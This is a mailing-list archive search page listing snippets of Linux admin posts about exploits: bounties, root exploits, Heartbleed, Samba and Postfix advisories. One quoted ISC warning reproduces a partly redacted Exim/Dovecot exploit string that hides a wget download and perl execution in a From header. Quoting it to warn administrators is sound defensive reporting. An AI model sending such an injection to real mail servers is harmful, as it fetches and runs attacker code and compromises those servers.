Displaying 20 results from an estimated 2912 matches for "exploits".
Did you mean:
exploit
2012 Jan 16
2
bounties for exploits against CentOS?
With companies like Facebook and Google offering cash prizes for people
who can find security holes in their products, has there ever been any
consideration given to offering cash rewards to people finding security
exploits in CentOS or in commonly bundled services like Apache?
(Provided of course they follow "responsible disclosure" and report the
exploit to the software authors and get it fixed.)
Obviously the benefit would be that it would increase the chance of a
white hat finding and fixing an expl...
2006 Nov 14
2
Exploit
////usr/lib/kde3/kfile_ps.so: Exploit.Linux.Gv FOUND
////usr/lib/kde3/gsthumbnail.so: Exploit.Linux.Gv FOUND
////usr/lib/libgs.so.7.07: Exploit.Linux.Gv FOUND
////usr/lib/libkghostviewlib.so.0.0.0: Exploit.Linux.Gv FOUND
I start the procmail process and a mail with those lines appears on my
inbox (with subject "Virus found"), i'm running clamd too, but i dont
know if this files
2017 Apr 15
5
OT: systemd Poll - So Long, and Thanks for All the fish.
...source. It is highly unlikely that the
NSA, or any other agency, would risk putting in backdoors to code that
could be audited by Joe "random hacker" Blogs, let alone that might be
discovered by hostile agencies.
There is no doubt that most security agencies have a long list of zero-
day exploits in their toolbox - I would hazard to suggest that they
wouldn't be doing their job if they didn't! But I seriously doubt they
would commission exploitable code in something that is openly
auditable.
P.
2011 Dec 28
8
what percent of time are there unpatched exploits against default config?
..., so the machine just
hums along with all of its default settings.
So the machine can still be broken into, if there is an unpatched exploit
released in the wild, in the window of time before a patch is released for
that update. On the other hand, at any point in time where there are no
unpatched exploits in the wild, the machine should be much harder to break
into.
Roughly what percent of the time is there such an unpatched exploit in the
wild, so that the machine can be hacked by someone keeping up with the
exploits? 5%? 50%? 95%?
Hopefully this is specific enough that the answer is not "...
2008 Feb 11
5
local root exploit
I saw that there is a local root exploit in the wild.
http://blog.kagesenshi.org/2008/02/local-root-exploit-on-wild.html
And I see my centos box still has: 2.6.18-53.1.4.el5
yum says there are no updates... am I safe?
Valent.
2017 Feb 09
4
Serious attack vector on pkcheck ignored by Red Hat
On Thu, 2017-02-02 at 13:40 -0800, Gordon Messmer wrote:
> Escalation *requires* attacking a program in a security context other
> than your own.
Not necessarily. Suppose the adversary is aware of a root
exploit/privilege escalation in a random library. Then the heap spraying
allows this attacker to easily trigger this exploit because he is able
to initialize the entire contents of the
2013 Jun 09
1
from ISC: Exim/Dovecot exploit making the rounds
One of our readers wrote in to let us know that he had received an attempted
Exim/Dovecot exploit attempt against his email server. The exploit partially
looked like this:
From:
x`wget${IFS}-O${IFS}/tmp/crew.pl${IFS}50.xx.xx.xx/dc.txt``perl${IFS}/tmp/crew.pl`@blaat.com
(Obviously edited for your safety, and I didn't post the whole thing.)
This is an exploit against Dovecot that is using
2004 Dec 11
2
Security exploit downloaded with FLAC?
...ty exploit known as "Virus Tutorial" or
VTool/jul2. This has left me wondering if FLAC is to be trusted. Here's
what PestPatrol's web site has to say about it:
Exploit: A way of breaking into a system. An exploit takes advantage of a
weakness in a system in order to hack it. Exploits are the root of the
hacker culture. Hackers gain fame by discovering an exploit. Others gain
fame by writing scripts for it. Legions of script-kiddies apply the exploit
to millions of systems, whether it makes sense or not. Since people make the
same mistakes over-and-over, exploits for very di...
2003 Jun 11
2
Kulak exploit
...we were able to clean it up I never learned how.
A few weeks back, my own office machine was hacked and the signs were
similar; but this time I found an exploit program named "kulak" in my
/tmp directory.
Evidently (according to the source, which the attacker left behind also)
kulak exploits a buffer overflow in Samba 2.2.8 to get a root shell. I
searched Google to no avail for this exploit; so I am asking here. Is
this bug fixed in later versions? Has anyone even heard of this?
-- Chris.
2008 Feb 10
2
Root exploit in the wild
https://bugzilla.redhat.com/show_bug.cgi?id=432251
Mentioned on Slashdot here:
http://it.slashdot.org/article.pl?sid=08/02/10/2011257
Fedora bug report here:
https://bugzilla.redhat.com/show_bug.cgi?id=432229
--
MELVILLE THEATRE ~ Melville Sask ~ http://www.melvilletheatre.com
2014 Apr 08
2
OpenSSL Heartbeat exploit agains KVM guest systems
Is it possible to use this exploit against a kvm guest to read memory used by
the host? In other words: if an exploitable service, say httpd with mod_ssl,
is running in guest system 'vm1' hosted on system 'virthost' then what
implications does that have with respect to guests vm2 and vm3 and to virthost
itself?
--
*** E-Mail is NOT a SECURE channel ***
James
2014 Apr 08
2
OpenSSL Heartbeat exploit agains KVM guest systems
Is it possible to use this exploit against a kvm guest to read memory used by
the host? In other words: if an exploitable service, say httpd with mod_ssl,
is running in guest system 'vm1' hosted on system 'virthost' then what
implications does that have with respect to guests vm2 and vm3 and to virthost
itself?
--
*** E-Mail is NOT a SECURE channel ***
James
2005 Oct 15
2
GID Games Exploits
It has come to my attention that there are quite a few local exploits
circling around in the private sector for GID Games.
Several of the games have vanilla stack overflows in them which can lead to
elevation of privileges if successfully exploited.
1998 Feb 20
0
"not-so-dangerous symlink bugs" - a better look
Typical "[symbolic|hard] link bug" is a vunerability, which allows
user X to overwrite files owned by Y (with useless portion of junk)
when Y launchs buggy program. But this trivial (and often ignored)
attack method can be easily turned into a cute, powerful weapon. Here''s
an example how to perform advanced exploitation of gcc symlink bug (I
choosen that one, because this
2001 Nov 28
1
Possible root-exploit in openssh?
Hello...
I am a student at G?teborgs university who is the system adminstrator in
one of the student clubs here. We run about 10 computers with one server.
Mainly linux and all run openssh. We have closed telnet so only
ssh-connections is allowed.
Last night i got a mail from one of the system adminstrators at G?teborgs
university saying that there was a possible root exploit in all openssh
2004 Feb 18
2
is this mbuf problem real?
BM_207650
MEDIUM
Vulnerability
Version: 1 2/18/2004@03:47:29 GMT
Initial report
<https://ialert.idefense.com/KODetails.jhtml?irId=207650>
ID#207650:
FreeBSD Memory Buffer Exhaustion Denial of Service Vulnerability
(iDEFENSE Exclusive): Remote exploitation of a denial of service (DoS)
vulnerability in FreeBSD's memory buffers (mbufs) could allow attackers
to launch a DoS attack.
1996 Dec 06
0
phf & Bash exploit
This is probably fairly well known, I found it by accident while reading
about the 0xFF command sperator in older version of bash shell.
The newer phf cgi that comes with some versions of picasso and rembrant
have been patched for the obvious 0x0A newline escape, but can still be
escaped using 0xFF.
It takes vulnerabilites in both phf and bash for it to work.
I have tested this very
1998 Jul 14
3
Qpop CERT advisory?
Hello,
Anyone have information on whether RedHat-5.0+ is affected by the
recent (today's) CERT advisory regarding QPOP?
thanks,
-bp
--
B. James Phillippe <bryan@terran.org>
Linux Software Engineer, WGT Inc.
http://earth.terran.org/~bryan
2008 Feb 10
3
Bug#464969: xen-hypervisor-3.2-1-i386: Linux mmap()/vmsplice() exploit causes memory map corruption in hypervisor regardless of domain privilege
Package: xen-hypervisor-3.2-1-i386
Version: 3.2-1
Severity: critical
Tags: security
Justification: DoS of entire system regardless of privilege
When running the exploit listed in bug 464953 [1], Xen's memory state
becomes corrupted and the hypervisor eventually crashes, taking all of
the domU's with it. As such, this breaks operational behaviour, so I have
marked this as critical.
[1]
2017 Apr 10
2
Fwd: Obsolete NSA exploit for Postfix 2.0 - 2.2
This was just posted on the Postfix list. Centos 7 ships with:
postfix-2.10.1-6.el7
Has this cert advisory been applied to the Centos build of Postfix?
thank you
-------- Forwarded Message --------
Subject: Obsolete NSA exploit for Postfix 2.0 - 2.2
Date: Sun, 9 Apr 2017 16:18:06 -0400 (EDT)
From: Wietse Venema <wietse at porcupine.org>
To: Postfix users <postfix-users at